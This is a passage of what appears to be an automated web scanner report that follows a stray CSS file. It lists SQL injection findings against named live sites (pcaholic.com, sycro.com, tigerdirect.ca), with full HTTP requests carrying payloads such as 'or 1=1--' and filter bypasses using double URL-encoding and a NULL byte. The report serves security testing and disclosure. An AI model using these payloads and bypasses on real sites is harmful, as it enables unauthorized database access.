Last-Modified: Fri, 18 Mar 2011 16:11:29 GMT
ETag: "25d8568-354-49ec407d4ae40"
Accept-Ranges: bytes
Content-Length: 852
Vary: User-Agent
Connection: close
Content-Type: text/css

div.sociable { margin: 16px 0; }

span.sociable_tagline { position: relative; }
span.sociable_tagline span { display: none; width: 14em; }
span.sociable_tagline:hover span {
   position: absolute;
   display: block;
   top: -5em;
   background: #ffe;
   border: 1px solid #ccc;
   color: black;
   line-height: 1.25em;
}
.sociable span {
   display: block;
}
.sociable ul {
   display: inline;
   margin: 0 !important;
   padding: 0 !important;
}
.sociable ul li {
   background: none;
   display: inline !important;
   list-style-type: none;
   margin: 0;
   padding: 1px;
}
.sociable ul li:before { content: ""; }
.sociable img {
   float: none;
   width: 16px;
   height: 16px;
   border: 0;
   margin: 0;
   padding: 0;
}

.sociable-hovers {
   opacity: .4;
   -moz-opacity: .4;
   filter: alpha(opacity=40);
}
.sociable-hovers:hover {
   opacity: 1;
   -moz-opacity: 1;
   filter: alpha(opacity=100);
}

1.12. http://www.pcaholic.com/wp-includes/js/jquery/jquery.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pcaholic.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 88865280%20or%201%3d1--%20 and 88865280%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-includes/js/jquery/jquery.js?188865280%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 12:39:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.pcaholic.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 30 Sep 2011 12:39:43 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Nothing found for Wp-includes Js Jquery Jquery Js?188865280%20or%201%3d1--%20=1</title>
<meta name="google-site-verification" content="5NxqTfsAsneU2HvYnF5BuLdVSvQRPi8u-7KrKrkD3_k" />
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/begindownload.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/toggle.js"></script>
<link href="http://www.pcaholic.com/wp-content/themes/pcaholic/style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="http://www.pcaholic.com/wp-content/themes/pcaholic/images/favicon.ico" />
<link rel='stylesheet' id='contact-form-7-css' href='http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.6' type='text/css' media='all' />
<link rel='stylesheet' id='sociable-front-css-css' href='http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css?ver=3.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/l10n.js?ver=20101110'></script>
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/jquery/jquery.j
...[SNIP]...

Request 2

GET /wp-includes/js/jquery/jquery.js?188865280%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:39:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 11 Jul 2011 21:20:05 GMT
ETag: "25d8059-164e3-4a7d1bf388b40"
Accept-Ranges: bytes
Content-Length: 91363
Vary: User-Agent
Connection: close
Content-Type: application/javascript

/*!
* jQuery JavaScript Library v1.6.1
* http://jquery.com/
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizzle.js
* http://sizzlejs.com/
* Copyright 2011, The Dojo Foundation
* Released under the MIT, BSD, and GPL Licenses.
*
* Date: Thu May 12 15:04:36 2011 -0400
*/
(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!cj[a]){var b=f("<"+a+">").appendTo("body"),d=b.css("display");b.remove();if(d==="none"||d===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),c.body.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write("<!doctype><html><body></body></html>");b=cl.createElement(a),cl.body.appendChild(b),d=f.css(b,"display"),c.body.removeChild(ck)}cj[a]=d}return cj[a]}function cu(a,b){var c={};f.each(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}function ct(){cq=b}function cs(){setTimeout(ct,0);return cq=f.now()}function ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function cb(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTypes,e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(g=1;g<i;g++){if(g===1)for(h in a.converters)typeof h=="string"&&(e[h.toLowerCase()]=a.converters[h]);l=k,k=d[g];if(k==="*")k=l;else if(l!=="*"&&l!==k){m=l+" "+k,n=e[m]||e["* "+k];if(!n){p=b;for(o in e){j=o.split(" ");if(j[0]===l||j[0]==="*"){p=e[j[1]+" "+k];if(p){o=e[o],o===!0?n=p:p===!0&
...[SNIP]...

1.13. http://www.pcaholic.com/wp-includes/js/l10n.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pcaholic.com
Path:   /wp-includes/js/l10n.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 17799343%20or%201%3d1--%20 and 17799343%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-includes/js/l10n.js?117799343%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 12:39:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.pcaholic.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 30 Sep 2011 12:39:39 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Nothing found for Wp-includes Js L10n Js?117799343%20or%201%3d1--%20=1</title>
<meta name="google-site-verification" content="5NxqTfsAsneU2HvYnF5BuLdVSvQRPi8u-7KrKrkD3_k" />
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/begindownload.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/toggle.js"></script>
<link href="http://www.pcaholic.com/wp-content/themes/pcaholic/style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="http://www.pcaholic.com/wp-content/themes/pcaholic/images/favicon.ico" />
<link rel='stylesheet' id='contact-form-7-css' href='http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.6' type='text/css' media='all' />
<link rel='stylesheet' id='sociable-front-css-css' href='http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css?ver=3.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/l10n.js?ver=20101110'></script>
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/jquery/jquery.js?ver=1.6
...[SNIP]...

Request 2

GET /wp-includes/js/l10n.js?117799343%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:39:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 11 Jul 2011 21:20:05 GMT
ETag: "25d8221-134-4a7d1bf388b40"
Accept-Ranges: bytes
Content-Length: 308
Vary: User-Agent
Connection: close
Content-Type: application/javascript

function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b};

1.14. http://www.pcaholic.com/xmlrpc.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pcaholic.com
Path:   /xmlrpc.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 15000864%20or%201%3d1--%20 and 15000864%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /xmlrpc.php?115000864%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 12:39:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.pcaholic.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 30 Sep 2011 12:39:40 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Nothing found for Xmlrpc Php?115000864%20or%201%3d1--%20=1</title>
<meta name="google-site-verification" content="5NxqTfsAsneU2HvYnF5BuLdVSvQRPi8u-7KrKrkD3_k" />
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/begindownload.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/toggle.js"></script>
<link href="http://www.pcaholic.com/wp-content/themes/pcaholic/style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="http://www.pcaholic.com/wp-content/themes/pcaholic/images/favicon.ico" />
<link rel='stylesheet' id='contact-form-7-css' href='http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.6' type='text/css' media='all' />
<link rel='stylesheet' id='sociable-front-css-css' href='http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css?ver=3.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/l10n.js?ver=20101110'></script>
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/jquery/jquery.js?ver=1.6.1'></script
...[SNIP]...

Request 2

GET /xmlrpc.php?115000864%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:39:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/plain
Content-Length: 42

XML-RPC server accepts POST requests only.

1.15. http://www.sycro.com/sycro/comm/stats.asp [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sycro.com
Path:   /sycro/comm/stats.asp

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /sycro/comm/stats.asp HTTP/1.1
Host: www.sycro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Fri, 30 Sep 2011 12:32:54 GMT
X-Powered-By: ASP.NET
Connection: close
Location: /sycro/order/basket.asp?mode=error500
Content-Length: 158
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/sycro/order/basket.asp?mode=error500">here</a>.</body>

Request 2

GET /sycro/comm/stats.asp HTTP/1.1
Host: www.sycro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 30 Sep 2011 12:32:55 GMT
X-Powered-By: ASP.NET
Connection: close
Content-Length: 21
Content-Type: application/x-javascript
Cache-control: private


document.write("");

1.16. http://www.tigerdirect.ca/cgi-bin/order.asp [EdpNo parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tigerdirect.ca
Path:   /cgi-bin/order.asp

Issue detail

The EdpNo parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the EdpNo parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /cgi-bin/order.asp?EdpNo=1104495'&qty=1&cm_re=Homepage-_-Spot%2003-_-CatId_4441_P229-1128 HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=4304010201109300823205023123106; SRCCODE=CANW; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:29:41 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHRoutine=25&Referer=a4be4dd25e0ad12821b1539&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&rNavLastVisit=&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=4488505%252d%252d%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e3d7c791fd12; path=/
Set-Cookie: SRVR=WEBX13%2D01A; path=/
Vary: Accept-Encoding
Content-Length: 67521


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
<!--e(source) :Microsoft OLE DB Provider for ODBC Drivers-->
...[SNIP]...

1.17. https://www.tigerdirect.ca/secure/orderlogin.asp [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.tigerdirect.ca
Path:   /secure/orderlogin.asp

Issue detail

The PG parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PG parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the PG request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /secure/orderlogin.asp?PG=1%2527 HTTP/1.1
Host: www.tigerdirect.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:31:28 GMT
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Content-Length: 43346
Content-Type: text/html
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&CaptchaOutVal=&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44%27+and+1%3D2%2D%2D+; path=/
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: Cart=PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=%5D%5D%3E%3E; path=/
Set-Cookie: beta=Y; path=/
Cache-control: private


</form>
<html>
<head>
<noscript>
<meta http-equiv="refresh" content="1;URL=/sectors/nojs/index.asp">
</noscript>
<script Language="Javascript">
function addToCart(h2fsku, sku, qty) {
var
...[SNIP]...
<a href="http://www.tigerdirect.ca/sectors/bugreport/?errorURL=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgisec%2ForderWarranty%2Easp" target="_blank">
...[SNIP]...

Request 2

GET /secure/orderlogin.asp?PG=1%2527%2527 HTTP/1.1
Host: www.tigerdirect.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:31:30 GMT
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Content-Length: 49806
Content-Type: text/html
Expires: Fri, 30 Sep 2011 12:30:30 GMT
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&CaptchaOutVal=&msProduct=1782290&msRandX=44%27+and+1%3D2%2D%2D+; path=/
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Set-Cookie: Warranty=; expires=Sat, 03-Jan-2009 13:31:30 GMT; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHRoutine=25&Referer=%5D%5D%3E%3E&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&rNavLastVisit=&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E; path=/
Cache-control: private


<html>
<head>
<title>Order Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="TigerDirect.com is your complete o
...[SNIP]...

1.18. https://www.tigerdirect.ca/secure/orderlogin.asp [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.tigerdirect.ca
Path:   /secure/orderlogin.asp

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /secure/orderlogin.asp HTTP/1.1
Host: www.tigerdirect.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:31:38 GMT
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Content-Length: 43364
Content-Type: text/html
Set-Cookie: DB=msRandX=44%27+and+1%3D2%2D%2D+&msProduct=1782290&Surveyflag=1&CaptchaOutVal=&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&Sidenav=B&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg; path=/
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: Cart=PHRoutine=25&Referer=596c7%250d%250aef0438428a3&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&rNavLastVisit=&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E; path=/
Set-Cookie: beta=Y; path=/
Cache-control: private


</form>
<html>
<head>
<noscript>
<meta http-equiv="refresh" content="1;URL=/sectors/nojs/index.asp">
</noscript>
<script Language="Javascript">
function addToCart(h2fsku, sku, qty) {
var
...[SNIP]...
<a href="http://www.tigerdirect.ca/sectors/bugreport/?errorURL=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgisec%2ForderWarranty%2Easp" target="_blank">
...[SNIP]...

Request 2

GET /secure/orderlogin.asp HTTP/1.1
Host: www.tigerdirect.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
